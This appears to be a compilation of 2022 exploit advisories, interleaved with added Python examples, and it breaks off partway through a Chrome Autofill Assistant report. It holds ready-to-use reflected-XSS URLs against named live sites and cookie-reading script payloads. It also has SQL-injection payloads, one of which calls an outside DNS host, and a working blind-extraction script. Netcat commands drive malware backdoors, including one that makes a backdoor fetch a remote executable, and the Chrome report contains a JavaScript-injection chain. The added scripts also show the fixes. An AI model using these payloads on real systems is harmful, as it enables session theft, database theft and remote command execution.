<pre><code>CraCkEr - The CraCk of Eternal Might<br />From The Ashes and Dust Rises An Unimaginable crack....<br /><br />[ Exploits ]<br /><br />Author   : CraCkEr<br />Website  : extensions.joomla.org<br />Vendor   : RAXO Group - raxo.org<br />Software : Joomla RAXO All-mode PRO 2.01<br />Vuln Type: Reflected XSS<br />Method   : GET<br />Impact   : Manipulate the content of the site<br /><br />B4nks-NET irc.b4nks.tk #unix<br /><br />Release Notes:<br />==============<br />An attacker can send the victim a link containing the malicious URL by email or instant message. When the victim opens it, the injected script runs in the victim's browser in the context of the vulnerable site and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br />Greets:<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL<br /><br />CryptoJob (Twitter) twitter.com/CryptozJob<br /><br />© CraCkEr 2022<br /><br /><br />Path: /search-results<br /><br />GET parameter 'search' is vulnerable to XSS<br /><br />https://www.target.com/search-results?search=hep3l%22onfocus%3d%22alert(1)%22autofocus%3d%22oakzt<br /><br />Decoded, the payload is hep3l"onfocus="alert(1)"autofocus="oakzt: the value is reflected inside a double-quoted attribute, the first " closes that attribute, and the added autofocus attribute makes the onfocus handler fire without any user interaction.<br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: Canteen-Management1.0-2022 SQLi<br />## Author: nu11secur1ty<br />## Date: 10.04.2022<br />## Vendor: https://www.mayurik.com/<br />## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi<br /><br />## Description:<br />The username parameter of the login form in Canteen-Management1.0-2022 is vulnerable to SQL injection. A remote attacker can use it to read the entire database of the application; sqlmap confirmed both a boolean-based blind and a time-based blind injection. The load_file() call on a UNC path in the payloads below is sqlmap's out-of-band DNS probe: a MySQL server running on Windows resolves the attacker-controlled host name when it evaluates that expression.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Payload:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br />    Type: boolean-based blind<br />    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br />    Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login=<br /><br />    Type: time-based blind<br />    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />    Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND 'awEr'='awEr&password=h5F!l8j!Y6&login=<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/vvz2lh)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
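As an added example (not Canteen Management's code, nor nu11secur1ty's), the Python script below reproduces the boolean-based blind vector from the sqlmap output above against an in-memory SQLite database. The users table, its single row, the staff table whose contents get extracted, and the shape of the login query are all assumptions. Under that query shape the application appends its own AND password='...' after the injected branch, which is why sqlmap's payload carries a valid password (h5F!l8j!Y6 in the advisory): with it, the login response becomes a stable yes/no oracle that reads any string out of the database one character at a time. The same input is inert once the values are bound as parameters. SQLite has no load_file() or SLEEP(), so the DNS probe and the time-based variant are left out.

```python
"""Boolean-based blind SQL injection through a login form, reproduced
against an in-memory SQLite database (added example, not the product's code).

Assumptions: the table layout, the constructed rows, and the query shape
"WHERE username='...' AND password='...'".
"""
import sqlite3
import string


def make_db():
    # Constructed data: one valid account plus a row the attacker wants to read.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('UvIiDwEB', 'h5F!l8j!Y6')")
    con.execute("CREATE TABLE staff (name TEXT, role TEXT)")
    con.execute("INSERT INTO staff VALUES ('admin', 'manager')")
    return con


def login_vulnerable(con, username, password):
    # The bug class: request fields pasted into the statement text.
    sql = ("SELECT COUNT(*) FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    return con.execute(sql).fetchone()[0] > 0


def login_parameterized(con, username, password):
    # The fix: values travel as bound parameters, never as SQL text.
    sql = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone()[0] > 0


def oracle(con, condition):
    """Ask the vulnerable login one yes/no question about the database.

    Vector from the advisory: username = X' OR NOT <cond> AND 'gzCy'='gzCy
    The application appends " AND password='...'" to that, so the injected
    branch only yields a row when the password is right (hence the valid
    password).  A TRUE condition makes the login FAIL, so invert the answer.
    """
    injected = "nobody' OR NOT (%s) AND 'gzCy'='gzCy" % condition
    return not login_vulnerable(con, injected, "h5F!l8j!Y6")


def extract_via_oracle(con, subquery, alphabet=string.ascii_lowercase):
    """Recover the string a subquery returns, one position at a time, by
    asking the oracle substr(...)=c for every candidate character."""
    recovered = ""
    while True:
        position = len(recovered) + 1
        for ch in alphabet:
            question = "substr((%s),%d,1)='%s'" % (subquery, position, ch)
            if oracle(con, question):
                recovered += ch
                break
        else:
            return recovered  # nothing matched: past the end of the string


if __name__ == "__main__":
    db = make_db()
    print("oracle(1=1):", oracle(db, "1=1"))
    print("admin role via blind extraction:",
          extract_via_oracle(db, "SELECT role FROM staff WHERE name='admin'"))
    print("same payload against the parameterized login:",
          login_parameterized(db, "nobody' OR NOT (1=2) AND 'gzCy'='gzCy", "h5F!l8j!Y6"))
```

The extraction loop is the whole of what sqlmap automates for a boolean-blind finding: many requests, each answering one comparison, with the true/false split taken from the login response. The time-based payload in the advisory answers the same question by response delay instead of response content.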
<pre><code>CraCkEr - [ Exploits ]<br /><br />Author   : CraCkEr<br />Website  : extensions.joomla.org<br />Vendor   : Solidres Team<br />Software : Joomla Solidres 2.12.9<br />Vuln Type: Reflected XSS<br />Method   : GET<br />Impact   : Manipulate the content of the site<br /><br />Release Notes:<br />==============<br />An attacker can send the victim a link containing the malicious URL by email or instant message. When the victim opens it, the injected script runs in the victim's browser in the context of the vulnerable site and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br />© CraCkEr 2022<br /><br /><br />GET parameter 'prices' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/<br /><br />https://demo.solidres.com/joomla/greenery_hub/index.php/en/?option=com_solidres&task=hub.updateFilter&location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&prices=cqsw4%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22jlc4w&stars=4&<br /><br />(The 'prices' payload closes the attribute it is reflected into and adds an onmouseover handler together with a style that stretches the element over the whole viewport, so the first mouse movement triggers it. The remaining payloads close their tag with "> and inject a script element.)<br /><br />GET parameter 'location' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations<br /><br />https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=a8s3m%22%3e%3cscript%3ealert(1)%3c%2fscript%3esnein&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc<br /><br />GET parameter 'room_quantity' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations<br /><br />https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=h32cq%22%3e%3cscript%3ealert(1)%3c%2fscript%3etzlez&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc<br /><br />GET parameter 'room_opt[1][adults]' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations<br /><br />https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=qa0is%22%3e%3cscript%3ealert(1)%3c%2fscript%3ekvqtk&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc<br /><br />GET parameter 'room_opt[1][children]' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations<br /><br />https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=xcpf7%22%3e%3cscript%3ealert(1)%3c%2fscript%3exhufo&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc<br /><br />GET parameter 'start' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations<br /><br />https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=m85s0%22%3e%3cscript%3ealert(1)%3c%2fscript%3eu48v0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc<br /><br />GET parameter 'Itemid' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations<br /><br />https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=t2ofl%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyf30r&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/de6220a8e8fcbbee9763fb10e0ca23d7.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Delf.eg<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP port 7401 and requires no authentication. Any third party who can reach an infected system can issue the commands the backdoor exposes: sending "exec" followed by a program name launches that program, sending "exec" followed by a URL opens it in the victim's browser, and so forth.<br />Family: Delf<br />Type: PE32<br />MD5: de6220a8e8fcbbee9763fb10e0ca23d7<br />Vuln ID: MVID-2022-0647<br />Disclosure: 10/02/2022<br /><br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 7401<br />Warning<br />exec calc.exe<br />42<br />exec https://www.malvuln.com/DOOM.exe<br />42<br />QUIT<br />221 Merci d'avoir utilisé Under7 version 4.3, crée par Liquid Snake<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>CraCkEr - [ Exploits ]<br /><br />Author   : CraCkEr<br />Website  : extensions.joomla.org<br />Vendor   : Les Arbres Design<br />Software : Joomla Rentalot Plus 19.05<br />Vuln Type: Reflected XSS<br />Method   : GET<br />Impact   : Manipulate the content of the site<br /><br />Release Notes:<br />==============<br />An attacker can send the victim a link containing the malicious URL by email or instant message. When the victim opens it, the injected script runs in the victim's browser in the context of the vulnerable site and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br />© CraCkEr 2022<br /><br />Path: /check-view<br /><br />GET parameter 'instance' is vulnerable to XSS<br /><br />https://demo.lesarbresdesign.info/check-view?option=com_rentalotplus&controller=check&task=ajax_get_availability&format=raw&tmpl=component&version=detailed&datefrom=&currency=undefined&instance=byhiw"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"onuph<br /><br />(The payload is shown unencoded. It closes the attribute it is reflected into, adds an onmouseover handler and a style that stretches the element over the whole viewport, so any mouse movement on the page fires the handler.)<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/273fd3f33279cc9c0378a49cf63d7a06.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.NTRC<br />Vulnerability: Weak Hardcoded Credentials<br />Family: NTRC<br />Type: PE32<br />MD5: 273fd3f33279cc9c0378a49cf63d7a06<br />Vuln ID: MVID-2022-0646<br />Disclosure: 10/02/2022<br />Description: The malware listens on TCP port 6767. Authentication is required, but the password "Please change me" is weak and stored in cleartext in the binary at offset 0045E520. A command is executed by sending the password and the command name, each terminated by a semicolon ";", e.g. Please change me;SystemInfo;. The SendScreen command dumps a screenshot as a .BMF file; to fetch the next part of the file, send SendScreenNextPart. In the PoC below, the three commands sent before the password get no reply.<br /><br />0045E520 dd 16                    ; Len<br />0045E520 db 'Please change me',0  ; Text<br />0045E539 align 4<br /><br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 6767<br />SendScreen<br />SendScreenNextPart<br />Stop<br /><br />Please change me;Shutdown;<br />Error;Can not shutdown the server. Please contact the author at borgo@bigfoot.com<br />Please change me;Logoff;<br /><br />Please change me;SystemInfo;<br />SystemInfo;6.2;9200;Windows NT;Victim;DESKTOP-2C3IQHO;C:\WINDOWS;1;Intel;Intel Pentium<br /><br />Please change me;SystemInfo2;<br />;;;;;0;0;0;0;0;;;;9 Mb;1480.29 Mb;27 %;2687.49 Mb;1607.21 Mb;40 %;2047.88 Mb;1893.88 Mb;D<br /><br />Please change me;Logoff;<br />FolderMonitorChanged<br /></code></pre>
<pre><code># Exploit Title: XSS via the ReturnURL parameter<br /># Exploit Author: VP4TR10T<br /># Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/<br /># Software Link: http://passwordmanager.adiscon.com/<br /># Version: 2.0<br /># Tested on: Windows<br /># CVE: CVE-2022-36664<br /><br />Affected URI (when changing a user's password):<br />POST /isapi/PasswordManager.dll HTTP/1.1<br /><br />HTTP payload (affected parameter):<br />ReturnURL=<script>alert(document.cookie)</script><br /><br />Cordially,<br /></code></pre>
<pre><code>CraCkEr - [ Exploits ]<br /><br />Author   : CraCkEr<br />Website  : extensions.joomla.org<br />Vendor   : Team MarvikShop<br />Software : Joomla MarvikShop ShoppingCart 3.4<br />Vuln Type: Reflected XSS<br />Method   : GET<br />Impact   : Manipulate the content of the site<br /><br />Release Notes:<br />==============<br />An attacker can send the victim a link containing the malicious URL by email or instant message. When the victim opens it, the injected script runs in the victim's browser in the context of the vulnerable site and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br />© CraCkEr 2022<br /><br />Path: /en/index.php<br /><br />GET parameter 'sortdir' is vulnerable to XSS<br /><br />https://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=descgt5po<img src=a onerror=alert(1)>vh217<br /><br />GET parameter 'limitstart' is vulnerable to XSS<br /><br />https://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0lmefx<img src=a onerror=alert(1)>fe7s7<br /><br />GET parameter 'limit' is vulnerable to XSS<br /><br />https://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0&limit=25oj1c5<img src=a onerror=alert(1)>tquly<br /><br /><br />[-] Done<br /></code></pre>
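The reflected-XSS advisories above (RAXO All-mode PRO, Solidres, Rentalot Plus, the Adiscon ReturnURL report and MarvikShop) all show the same bug class in two output contexts: a value reflected inside a quoted attribute, where a stray " lets the attacker add an on* handler, and a value reflected as element text, where a < lets the attacker open a new tag. The Python script below is an added example and is not code from any of those products or authors. The page templates are assumptions, and Python's HTMLParser stands in for the browser. It runs the decoded RAXO 'search' payload through a vulnerable attribute-context template and through one that HTML-encodes the value, does the same with the MarvikShop <img onerror> payload in a text context, and lists the on* handlers the parsed markup ends up with.

```python
"""Reflected XSS in two output contexts and the encoding that stops it.

Added example, not code from any of the Joomla extensions or from Adiscon.
The templates are assumed; the payloads are the ones in the advisories.
"""
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Decoded 'search' value from the RAXO advisory: attribute-context payload.
RAXO_SEARCH = unquote("hep3l%22onfocus%3d%22alert(1)%22autofocus%3d%22oakzt")
# 'sortdir' value from the MarvikShop advisory: text-context payload.
MARVIK_SORTDIR = "descgt5po<img src=a onerror=alert(1)>vh217"


def attribute_page(value, encode):
    """Assumed template that reflects the value inside a double-quoted attribute."""
    if encode:
        # quote=True turns " into &quot;, so the attribute can never be closed early.
        value = html.escape(value, quote=True)
    return '<form><input type="text" name="search" value="' + value + '"></form>'


def text_page(value, encode):
    """Assumed template that reflects the value as element text."""
    if encode:
        # < becomes &lt;, so no new tag can start inside the reflected text.
        value = html.escape(value)
    return "<p>Sorted " + value + "</p>"


class _TagCollector(HTMLParser):
    """Records every start tag with its attributes, as a browser would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    handle_startendtag = handle_starttag


def event_handlers(markup):
    """Return every (tag, on*-attribute) pair in the markup.  When the reflected
    input was hostile, anything listed here is attacker-controlled script."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return [(tag, name) for tag, attrs in collector.tags
            for name in attrs if name.startswith("on")]


if __name__ == "__main__":
    for label, page, payload in (("attribute", attribute_page, RAXO_SEARCH),
                                 ("text", text_page, MARVIK_SORTDIR)):
        print(label, "unencoded:", event_handlers(page(payload, encode=False)))
        print(label, "encoded:  ", event_handlers(page(payload, encode=True)))
```

Note that the MarvikShop payload contains no quote and would be harmless inside a quoted attribute, while the RAXO payload contains no < and would be harmless as element text; the encoder has to match the context the value is written into, and html.escape with quote=True covers both of these.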
<pre><code>CraCkEr - [ Exploits ]<br /><br />Author   : CraCkEr<br />Website  : extensions.joomla.org<br />Vendor   : Team MarvikShop<br />Software : Joomla MarvikShop ShoppingCart 3.4<br />Vuln Type: SQL Injection<br />Method   : GET<br />Impact   : Database Access<br /><br />Release Notes:<br />==============<br />The 'sortdir' parameter of the product listing is placed unescaped into the ORDER BY clause of the query, so an attacker can inject SQL through it and read data from the back-end database. sqlmap confirmed an error-based injection (MySQL EXTRACTVALUE) and retrieved the name of the current database.<br /><br />© CraCkEr 2022<br /><br />Path: /en/index.php<br /><br />GET parameter 'sortdir' is vulnerable<br /><br />---<br />Parameter: sortdir (GET)<br />    Type: error-based<br />    Title: MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)<br />    Payload: option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc,EXTRACTVALUE(9096,CONCAT(0x5c,0x7178787871,(SELECT (ELT(9096=9096,1))),0x7171626271))&limitstart=0&limit=25<br />---<br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: Nginx, PHP 7.1.33<br />back-end DBMS: MySQL >= 5.1 (MariaDB fork)<br />[INFO] fetching current database<br /><br />current database: 'stenen_test'<br /><br /><br />[-] Done<br /></code></pre>
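ORDER BY is the one place where parameter binding cannot help: column names and sort directions are identifiers, not values, so the fix is an allowlist. The Python below is an added example (not MarvikShop's code); the products table and its column names are assumptions, and SQLite stands in for MySQL. It runs the advisory's sortdir payload through a string-built query (SQLite parses it as SQL and then fails on the MySQL-only function, which is the injection reaching the engine), shows that the common non-fix ORDER BY ? silently ignores the requested column, applies an allowlist that refuses the payload outright, and parses the value sqlmap hides between its 0x7178787871 and 0x7171626271 markers out of a MySQL XPATH error message. The two error messages in the test are constructed, the second from the 'stenen_test' result above.

```python
"""ORDER BY injection through 'sortdir': the non-fixes, the fix, and a
parser for the value sqlmap smuggles out through EXTRACTVALUE() errors.

Added example, not MarvikShop code.  Table, rows and column names are
assumed; SQLite stands in for MySQL, so the injected EXTRACTVALUE() fails
with "no such function" instead of leaking data.
"""
import re
import sqlite3

# sortdir value from the advisory's sqlmap payload.
SQLMAP_SORTDIR = ("desc,EXTRACTVALUE(9096,CONCAT(0x5c,0x7178787871,"
                  "(SELECT (ELT(9096=9096,1))),0x7171626271))")

# sqlmap brackets every extracted value with these markers so it can find
# the value in whatever error text the server returns.
MARK_BEGIN = bytes.fromhex("7178787871").decode()   # 'qxxxq'
MARK_END = bytes.fromhex("7171626271").decode()     # 'qqbbq'

# Allowlist: request value -> SQL fragment.  Column names are assumed.
SORT_COLUMNS = {"products_sort_order": "sort_order", "latest": "added"}
SORT_DIRS = {"asc": "ASC", "desc": "DESC"}


def make_db():
    # Constructed rows: the order they are inserted is not any sort order.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (name TEXT, added INTEGER, sort_order INTEGER)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?)",
                    [("pebble", 1, 3), ("granite", 2, 1), ("slate", 3, 2)])
    return con


def products_vulnerable(con, column, sortdir):
    # The bug class: ORDER BY assembled by string formatting.
    sql = "SELECT name FROM products ORDER BY %s %s" % (column, sortdir)
    return [row[0] for row in con.execute(sql)]


def products_bound(con, column):
    # A non-fix: "ORDER BY ?" binds a string constant, so every row has the
    # same sort key and the requested column has no effect at all.
    sql = "SELECT name FROM products ORDER BY ?"
    return [row[0] for row in con.execute(sql, (column,))]


def products_allowlisted(con, sort, sortdir):
    # The fix: map request values onto fixed fragments; anything else is refused.
    try:
        fragment = "%s %s" % (SORT_COLUMNS[sort], SORT_DIRS[sortdir.lower()])
    except KeyError:
        raise ValueError("unsupported sort parameter") from None
    return [row[0] for row in con.execute("SELECT name FROM products ORDER BY " + fragment)]


def injection_reaches_engine(con, sortdir):
    """True when the database parsed the injected text as SQL: SQLite gets as
    far as resolving the injected function name before giving up."""
    try:
        products_vulnerable(con, "added", sortdir)
        return False
    except sqlite3.OperationalError as exc:
        return "no such function" in str(exc)


def allowlist_rejects(con, sort, sortdir):
    """True when the allowlisted query refuses the request outright."""
    try:
        products_allowlisted(con, sort, sortdir)
        return False
    except ValueError:
        return True


def value_from_xpath_error(message):
    """MySQL rejects CONCAT(0x5c, 'qxxxq', <expr>, 'qqbbq') as an XPath
    expression and echoes it in the error text; the result of <expr> sits
    between the two markers."""
    match = re.search(re.escape(MARK_BEGIN) + "(.*?)" + re.escape(MARK_END), message)
    return match.group(1) if match else None


if __name__ == "__main__":
    db = make_db()
    print("string-built query, payload reaches the engine:", injection_reaches_engine(db, SQLMAP_SORTDIR))
    print("ORDER BY ? ignores the column:", products_bound(db, "added") == products_bound(db, "sort_order"))
    print("allowlist refuses the payload:", allowlist_rejects(db, "latest", SQLMAP_SORTDIR))
    print("value in a constructed XPATH error:",
          value_from_xpath_error("XPATH syntax error: '\\qxxxqstenen_testqqbbq'"))
```

The (SELECT (ELT(9096=9096,1))) in the payload only evaluates to '1'; it is sqlmap's confirmation step. Once the channel works, the same slot is filled with DATABASE(), table names and row data, which is how the 'stenen_test' line in the output above was obtained.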
<pre><code>Chrome: Universal XSS in Autofill Assistant<br /><br />VULNERABILITY DETAILS<br />From the Autofill Assistant README file[1]:<br /><br />Autofill Assistant is an execution engine to run user journeys on websites given a set of actions. These actions include clicking on buttons or scrolling to an element. They also provide a way to interact with the user or get input to advance in the flow.<br /><br />This report describes a chain of issues in the implementation of the assistant that allows a malicious attacker to execute JavaScript code in the context of an arbitrary website.<br /><br />1. Launch Check Bypass<br /><br />There are several ways to launch a user journey i.e. to activate the assistant on a specific web page. From an attacker's point of view, the most interesting one is via Android intent:// URIs. To run the assistant, a web page simply needs to initiate navigation to a special URI. However, `ExternalNavigationHandler::handleWithAutofillAssistant()` is only meant to launch the journey if the navigation request comes from a web page in a subdomain of google.com i.e. a trusted source[2]. Unfortunately, if you look at the source code of `ExternalNavigationHandler::isGoogleReferrer()`[3], you'll notice that it actually only checks whether the main frame of the tab that's being navigated currently hosts a google.com page. This means the attacker can bypass the check by opening a google.com page first and then navigating it to the intent URI. 
This action doesn't violate the same-origin policy.<br /><br />```<br />w = open("https://google.com/");<br />setTimeout(() => w.location = "intent://...", 1000);<br /><br />```<br /><br />Another way to bypass the check is by putting a regular https:// link somewhere on google.com to the attacker-controlled website and configuring the attacker's web server to reply with an HTTP redirect to the intent:// URI.<br /><br />It's not clear whether the intended (rather than actual) checks are still too coarse-grained. Can an intent link be hosted on a user-controlled page in a subdomain of google.com, for example, via Google Sites? Can a third-party Android app launch the intent directly?<br /><br />2. Parameter Manipulation<br /><br />Autofill Assistant intent URIs include the address of the target web page, as well as script parameters, which the attacker can arbitrarily modify. Some of the parameters, like `DISABLE_RPC_SIGNING`[4] or `PASSWORD_CHANGE_USERNAME`, seem to have security impact. Also, the `DETAILS_*` parameter group allows the attacker to show a partially-controlled native-looking user interface on top of websites that have associated user journeys.<br /><br />If, at the moment, only Google is allowed to create these URIs, could signature checking be added to prevent arbitrary manipulation of the script parameters?<br /><br />3. Trigger Script Injection<br /><br />The most promising parameter is called `TRIGGER_SCRIPTS_BASE64`. It lets the attacker overwrite the backend's trigger script response[5]. Trigger scripts are lightweight scripts that may launch the regular journey flow once a certain set of conditions is met on the page. 
In addition, they can show a basic provisional user interface.<br /><br />Since the trigger condition definition language is powerful enough, for example, to perform a regex match on a specific property of a specific page element, and certain trigger actions, like loading a picture from an external server, may be visible to the attacker, a custom trigger script may be used to exfiltrate data from a web page character by character.<br /><br />A trigger script response can be overridden for any website, not just the ones that are currently supported by Autofill Assistant. Also, a user is shown a consent dialog when they attempt to use the assistant for the first time, but trigger scripts are executed without any user interaction.<br /><br />4. JavaScript Injection Via Property Filter<br /><br />`JsFilterBuilder` translates trigger conditions defined by a script into JavaScript code, which is then executed in the context of the target web page. The builder properly encodes all of its inputs, using functions like `AddArgument`[6] and making sure it's impossible to corrupt the generated function and execute arbitrary code, with one unfortunate exception:<br /><br />```<br />message PropertyFilter {<br /> // The property to filter against.<br /> optional string property = 1;<br /><br /> oneof value {<br /> TextFilter text_filter = 2;<br /> AutofillValueRegexp autofill_value_regexp = 3;<br /> }<br />}<br /><br />```<br /><br />The code that translates `PropertyFilter` simply concatenates the property name parameter, skipping the encoding[7]:<br /><br />```<br />bool JsFilterBuilder::AddFilter(const SelectorProto::Filter& filter) {<br />[...]<br /> case SelectorProto::Filter::kProperty:<br /> AddRegexpFilter(filter.property().text_filter(),<br /> filter.property().property());<br />[...]<br />}<br /><br />void JsFilterBuilder::AddRegexpFilter(const TextFilter& filter,<br /> const std::string& property) {<br /> std::string re_var = AddRegexpInstance(filter);<br /> 
Add­Line({"elements = elements.filter((e) => ", re_var, ".test(e.", property,<br />          "));"});<br />}<br /><br />```<br /><br />As a result, the attacker can run arbitrary JavaScript with a trigger script like the following:<br /><br />```<br />trigger_scripts {<br />  trigger_condition {<br />    selector {<br />      filters { css_selector: "*" }<br />      filters {<br />        property {<br />          property: "a+alert(location)"<br />          text_filter {<br />            re2: ""<br />          }<br />        }<br />      }<br />    }<br />  }<br />}<br /><br />```<br /><br />which gets translated into:<br /><br />```<br />elements = elements.filter((e) => v1.test(e.a + alert(location)));<br /><br />```<br /><br />[1] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/<br />[2] https://source.chromium.org/chromium/chromium/src/+/main:chrome/android/java/src/org/chromium/chrome/browser/externalnav/ExternalNavigationDelegateImpl.java;drc=4c4e66a10a1895d8be8b8978f938eb698ff93492;l=323<br />[3] https://source.chromium.org/chromium/chromium/src/+/main:components/external_intents/android/java/src/org/chromium/components/external_intents/ExternalNavigationHandler.java;drc=4c4e66a10a1895d8be8b8978f938eb698ff93492;l=2098<br />[4] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/browser/script_parameters.cc;drc=4c5a895bed6c12687227f92c8d66dfb0bfb03225;l=111<br />[5] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/browser/service.proto;drc=39e992a5452136dd9944c9c957245e3f88885e71;l=783<br />[6] 